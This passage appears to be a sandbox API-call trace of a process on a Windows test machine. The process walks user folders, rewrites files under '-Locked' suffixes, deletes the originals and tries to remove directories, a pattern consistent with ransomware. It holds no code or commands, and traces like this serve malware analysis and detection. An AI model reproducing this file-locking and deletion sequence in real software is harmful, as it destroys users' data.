(lpFileName="C:\\Users\\RDhJ0CNFevzX\\Videos\\1FfeATZnfpFdMi\\qnm0fu5.swf-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\videos\\1ffeatznfpfdmi\\qnm0fu5.swf-locked")) returned 1 [0307.566] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Videos\\1FfeATZnfpFdMi\\syhAMp2P7oE.flv-Locked-Locked", nBufferLength=0x105, lpBuffer=0x1aeb40, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Videos\\1FfeATZnfpFdMi\\syhAMp2P7oE.flv-Locked-Locked", lpFilePart=0x0) returned 0x49 [0307.566] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af034) returned 1 [0307.566] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Videos\\1FfeATZnfpFdMi\\syhAMp2P7oE.flv-Locked-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\videos\\1ffeatznfpfdmi\\syhamp2p7oe.flv-locked-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x49c [0307.566] GetFileType (hFile=0x49c) returned 0x1 [0307.566] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af030) returned 1 [0307.566] GetFileType (hFile=0x49c) returned 0x1 [0307.569] CloseHandle (hObject=0x49c) returned 1 [0307.588] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Videos\\1FfeATZnfpFdMi\\syhAMp2P7oE.flv-Locked", nBufferLength=0x105, lpBuffer=0x1aecc0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Videos\\1FfeATZnfpFdMi\\syhAMp2P7oE.flv-Locked", lpFilePart=0x0) returned 0x42 [0307.588] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Videos\\1FfeATZnfpFdMi\\syhAMp2P7oE.flv-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\videos\\1ffeatznfpfdmi\\syhamp2p7oe.flv-locked")) returned 1 [0307.589] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Videos\\1FfeATZnfpFdMi\\y2cTfXCEKtMuyCJVAqX.mkv-Locked-Locked", nBufferLength=0x105, lpBuffer=0x1aeb40, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Videos\\1FfeATZnfpFdMi\\y2cTfXCEKtMuyCJVAqX.mkv-Locked-Locked", lpFilePart=0x0) returned 0x51 [0307.589] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af034) returned 1 [0307.589] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Videos\\1FfeATZnfpFdMi\\y2cTfXCEKtMuyCJVAqX.mkv-Locked-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\videos\\1ffeatznfpfdmi\\y2ctfxcektmuycjvaqx.mkv-locked-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x49c [0307.590] GetFileType (hFile=0x49c) returned 0x1 [0307.590] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af030) returned 1 [0307.590] GetFileType (hFile=0x49c) returned 0x1 [0307.593] CloseHandle (hObject=0x49c) returned 1 [0307.594] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Videos\\1FfeATZnfpFdMi\\y2cTfXCEKtMuyCJVAqX.mkv-Locked", nBufferLength=0x105, lpBuffer=0x1aecc0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Videos\\1FfeATZnfpFdMi\\y2cTfXCEKtMuyCJVAqX.mkv-Locked", lpFilePart=0x0) returned 0x4a [0307.594] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Videos\\1FfeATZnfpFdMi\\y2cTfXCEKtMuyCJVAqX.mkv-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\videos\\1ffeatznfpfdmi\\y2ctfxcektmuycjvaqx.mkv-locked")) returned 1 [0307.595] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Videos\\1FfeATZnfpFdMi", nBufferLength=0x105, lpBuffer=0x1aed14, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Videos\\1FfeATZnfpFdMi", lpFilePart=0x0) returned 0x2b [0307.595] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af160) returned 1 [0307.595] GetFileAttributesExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Videos\\1FfeATZnfpFdMi" (normalized: "c:\\users\\rdhj0cnfevzx\\videos\\1ffeatznfpfdmi"), fInfoLevelId=0x0, lpFileInformation=0x1af1e0 | out: lpFileInformation=0x1af1e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x485b6f60, ftCreationTime.dwHighDateTime=0x1d7e0a0, ftLastAccessTime.dwLowDateTime=0x37bcd1ae, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x37bcd1ae, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0307.595] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af15c) returned 1 [0307.595] RemoveDirectoryW (lpPathName="C:\\Users\\RDhJ0CNFevzX\\Videos\\1FfeATZnfpFdMi" (normalized: "c:\\users\\rdhj0cnfevzx\\videos\\1ffeatznfpfdmi")) returned 0 [0307.596] CoTaskMemAlloc (cb=0x404) returned 0x73f0b8 [0307.596] FormatMessageW (in: dwFlags=0x3200, lpSource=0x0, dwMessageId=0x91, dwLanguageId=0x0, lpBuffer=0x73f0b8, nSize=0x200, Arguments=0x0 | out: lpBuffer="The directory is not empty.\r\n") returned 0x1d [0307.596] CoTaskMemFree (pv=0x73f0b8) [0307.599] CoTaskMemAlloc (cb=0x20c) returned 0x6c7110 [0307.599] SHGetFolderPathW (in: hwnd=0x0, csidl=28, hToken=0x0, dwFlags=0x0, pszPath=0x6c7110 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 0x0 [0307.602] CoTaskMemFree (pv=0x6c7110) [0307.602] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local", nBufferLength=0x105, lpBuffer=0x1aecac, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local", lpFilePart=0x0) returned 0x23 [0307.602] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af1d0) returned 1 [0307.602] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local", nBufferLength=0x105, lpBuffer=0x1aecd8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local", lpFilePart=0x0) returned 0x23 [0307.602] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\", nBufferLength=0x105, lpBuffer=0x1aecac, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\", lpFilePart=0x0) returned 0x24 [0307.602] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\*", lpFindFileData=0x1aeef8 | out: lpFindFileData=0x1aeef8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3cefc6a2, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x345fb549, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x345fb549, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x737a28 [0307.603] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3cefc6a2, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x345fb549, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x345fb549, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0307.603] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2397496d, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x2397496d, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x241f3052, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Comms", cAlternateFileName="")) returned 1 [0307.603] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x3d39b021, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x3d39b021, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x3d39b021, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="History", cAlternateFileName="")) returned 1 [0307.603] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x345d1d42, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x345d1d42, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x345d1d42, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="IconCache.db-Locked", cAlternateFileName="ICONCA~1.DB-")) returned 1 [0307.604] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3cefc6a2, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x3a17d745, ftLastAccessTime.dwHighDateTime=0x1d70699, ftLastWriteTime.dwLowDateTime=0x3a17d745, ftLastWriteTime.dwHighDateTime=0x1d70699, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft", cAlternateFileName="MICROS~1")) returned 1 [0307.604] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4252734, ftCreationTime.dwHighDateTime=0x1d70460, ftLastAccessTime.dwLowDateTime=0x4252734, ftLastAccessTime.dwHighDateTime=0x1d70460, ftLastWriteTime.dwLowDateTime=0x4252734, ftLastWriteTime.dwHighDateTime=0x1d70460, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="MicrosoftEdge", cAlternateFileName="MICROS~2")) returned 1 [0307.604] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x42cc0372, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x217bac55, ftLastAccessTime.dwHighDateTime=0x1d70503, ftLastWriteTime.dwLowDateTime=0x217bac55, ftLastWriteTime.dwHighDateTime=0x1d70503, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Packages", cAlternateFileName="")) returned 1 [0307.604] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x73f4dcd0, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x73f4dcd0, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x73f4dcd0, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PeerDistRepub", cAlternateFileName="PEERDI~1")) returned 1 [0307.604] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xdc699b5c, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xdc699b5c, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xdc699b5c, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Publishers", cAlternateFileName="PUBLIS~1")) returned 1 [0307.605] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3cefc6a2, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0xe23fd35a, ftLastAccessTime.dwHighDateTime=0x1d8224f, ftLastWriteTime.dwLowDateTime=0xe23fd35a, ftLastWriteTime.dwHighDateTime=0x1d8224f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Temp", cAlternateFileName="")) returned 1 [0307.605] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x3d39b021, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x3d39b021, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x3d39b021, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Temporary Internet Files", cAlternateFileName="TEMPOR~1")) returned 1 [0307.605] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x40a64b1d, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x40a64b1d, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x40a64b1d, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TileDataLayer", cAlternateFileName="TILEDA~1")) returned 1 [0307.605] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5599aefd, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x5599aefd, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x5599aefd, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="VirtualStore", cAlternateFileName="VIRTUA~1")) returned 1 [0307.605] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5599aefd, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x5599aefd, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x5599aefd, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="VirtualStore", cAlternateFileName="VIRTUA~1")) returned 0 [0307.606] FindClose (in: hFindFile=0x737a28 | out: hFindFile=0x737a28) returned 1 [0307.606] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af190) returned 1 [0307.606] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af19c) returned 1 [0307.606] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af1d0) returned 1 [0307.606] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local", nBufferLength=0x105, lpBuffer=0x1aecd8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local", lpFilePart=0x0) returned 0x23 [0307.606] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\", nBufferLength=0x105, lpBuffer=0x1aecac, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\", lpFilePart=0x0) returned 0x24 [0307.606] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\*", lpFindFileData=0x1aeef8 | out: lpFindFileData=0x1aeef8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3cefc6a2, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x345fb549, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x345fb549, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x737a28 [0307.606] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3cefc6a2, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x345fb549, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x345fb549, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0307.607] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2397496d, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x2397496d, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x241f3052, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Comms", cAlternateFileName="")) returned 1 [0307.607] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x3d39b021, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x3d39b021, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x3d39b021, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="History", cAlternateFileName="")) returned 1 [0307.607] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x345d1d42, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x345d1d42, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x345d1d42, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="IconCache.db-Locked", cAlternateFileName="ICONCA~1.DB-")) returned 1 [0307.607] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3cefc6a2, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x3a17d745, ftLastAccessTime.dwHighDateTime=0x1d70699, ftLastWriteTime.dwLowDateTime=0x3a17d745, ftLastWriteTime.dwHighDateTime=0x1d70699, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft", cAlternateFileName="MICROS~1")) returned 1 [0307.608] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4252734, ftCreationTime.dwHighDateTime=0x1d70460, ftLastAccessTime.dwLowDateTime=0x4252734, ftLastAccessTime.dwHighDateTime=0x1d70460, ftLastWriteTime.dwLowDateTime=0x4252734, ftLastWriteTime.dwHighDateTime=0x1d70460, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="MicrosoftEdge", cAlternateFileName="MICROS~2")) returned 1 [0307.608] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x42cc0372, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x217bac55, ftLastAccessTime.dwHighDateTime=0x1d70503, ftLastWriteTime.dwLowDateTime=0x217bac55, ftLastWriteTime.dwHighDateTime=0x1d70503, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Packages", cAlternateFileName="")) returned 1 [0307.608] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x73f4dcd0, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x73f4dcd0, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x73f4dcd0, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PeerDistRepub", cAlternateFileName="PEERDI~1")) returned 1 [0307.608] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xdc699b5c, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xdc699b5c, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xdc699b5c, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Publishers", cAlternateFileName="PUBLIS~1")) returned 1 [0307.608] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3cefc6a2, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0xe23fd35a, ftLastAccessTime.dwHighDateTime=0x1d8224f, ftLastWriteTime.dwLowDateTime=0xe23fd35a, ftLastWriteTime.dwHighDateTime=0x1d8224f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Temp", cAlternateFileName="")) returned 1 [0307.608] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x3d39b021, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x3d39b021, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x3d39b021, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Temporary Internet Files", cAlternateFileName="TEMPOR~1")) returned 1 [0307.609] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x40a64b1d, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x40a64b1d, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x40a64b1d, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="TileDataLayer", cAlternateFileName="TILEDA~1")) returned 1 [0307.609] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5599aefd, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x5599aefd, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x5599aefd, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="VirtualStore", cAlternateFileName="VIRTUA~1")) returned 1 [0307.609] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0307.609] FindClose (in: hFindFile=0x737a28 | out: hFindFile=0x737a28) returned 1 [0307.609] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af190) returned 1 [0307.609] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af19c) returned 1 [0307.609] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\IconCache.db-Locked-Locked", nBufferLength=0x105, lpBuffer=0x1aeb88, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\IconCache.db-Locked-Locked", lpFilePart=0x0) returned 0x3e [0307.609] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af07c) returned 1 [0307.610] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\IconCache.db-Locked-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\iconcache.db-locked-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x444 [0307.610] GetFileType (hFile=0x444) returned 0x1 [0307.610] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af078) returned 1 [0307.610] GetFileType (hFile=0x444) returned 0x1 [0307.612] CloseHandle (hObject=0x444) returned 1 [0307.612] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\IconCache.db-Locked", nBufferLength=0x105, lpBuffer=0x1aed08, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\IconCache.db-Locked", lpFilePart=0x0) returned 0x37 [0307.612] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\IconCache.db-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\iconcache.db-locked")) returned 1 [0307.613] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af188) returned 1 [0307.613] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Comms", nBufferLength=0x105, lpBuffer=0x1aec90, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Comms", lpFilePart=0x0) returned 0x29 [0307.613] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Comms\\", nBufferLength=0x105, lpBuffer=0x1aec64, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Comms\\", 